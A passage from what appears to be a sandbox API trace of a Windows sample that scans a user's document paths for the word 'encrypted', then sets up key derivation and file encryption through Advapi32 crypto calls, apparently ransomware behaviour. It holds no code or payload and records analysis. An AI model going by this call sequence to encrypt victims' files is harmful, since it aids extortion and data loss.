cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.850] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.850] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.850] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.850] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.850] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.852] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AINSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.852] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.852] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NSrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.852] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SrD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.852] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rD\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.852] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.852] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.852] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="007meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.852] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="07meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.852] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.852] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="meSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.852] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eSo66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.852] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="So66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.852] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.852] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="66\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.852] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.852] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.852] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oY6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.852] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.852] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.852] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qw7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.852] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.852] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.852] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.852] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.852] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="W3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.852] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3iuu.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.852] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.852] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0035.852] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0035.852] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.853] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.853] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oc", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.853] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="doc", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.853] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".doc", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0035.853] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.853] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.853] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.853] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.853] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.853] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x697d97e0, ftCreationTime.dwHighDateTime=0x1d5b721, ftLastAccessTime.dwLowDateTime=0xa3192220, ftLastAccessTime.dwHighDateTime=0x1d5bf06, ftLastWriteTime.dwLowDateTime=0xa3192220, ftLastWriteTime.dwHighDateTime=0x1d5bf06, nFileSizeHigh=0x0, nFileSizeLow=0x5068, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="oY6qw7y-W3iuu.doc", cAlternateFileName="OY6QW7~1.DOC")) returned 0x7c2100 [0035.853] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0035.853] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.853] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0035.853] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.853] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.853] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0035.853] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.853] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0035.853] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.854] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.854] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0035.854] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.854] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.854] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.854] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.854] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.854] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0035.854] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.854] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0035.855] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.855] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.855] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0035.855] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.855] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.855] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.855] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.855] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.855] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0035.855] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.855] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.856] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.856] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.856] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.856] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.856] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0035.856] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.856] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.856] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0035.856] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.856] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.856] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0035.856] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.856] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.856] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0035.856] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.856] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.856] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.856] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.856] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.856] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.856] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.856] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0035.856] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.857] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.857] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0035.857] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.857] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.857] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.857] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.857] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0035.857] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.857] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.857] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.857] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.857] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.857] CryptHashData (hHash=0x7c2240, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0035.857] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.857] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.857] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, 